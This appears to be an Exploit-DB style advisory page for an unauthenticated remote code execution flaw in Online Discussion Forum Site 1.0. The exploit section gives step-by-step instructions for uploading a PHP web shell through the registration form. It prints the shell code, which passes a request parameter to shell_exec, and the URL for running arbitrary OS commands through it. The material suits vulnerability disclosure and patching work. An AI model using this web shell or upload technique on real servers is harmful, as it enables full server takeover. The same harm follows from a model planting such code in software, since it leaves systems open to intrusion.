Online Discussion Forum Site 1.0 - Remote Code Execution

vendor:

Online Discussion Forum Site

by:

Selim Enes 'Enesdex' Karaduman

8.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Online Discussion Forum Site

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:online_discussion_forum_site

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 / Wamp Server

2020

Online Discussion Forum Site 1.0 – Remote Code Execution

Any unauthenticated attacker is able to execute arbitrary os command on the server by registering on the register page and uploading a shell.php file with a PHP-shell-code and then executing the os command via the uploaded shell.

Mitigation:

Authentication should be implemented to prevent unauthenticated attackers from executing arbitrary os commands.

Source

Exploit-DB raw data:

# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-24
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
Then fill other fields and upload the shell.php with following PHP-shell-code

<?php
$command = shell_exec($_REQUEST['cmd']);
echo $command;
?>

After the registration process is completed go to the following page and execute the os command via uploaded shell
http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE

Any unauthenticated attacker is able to execute arbitrary os command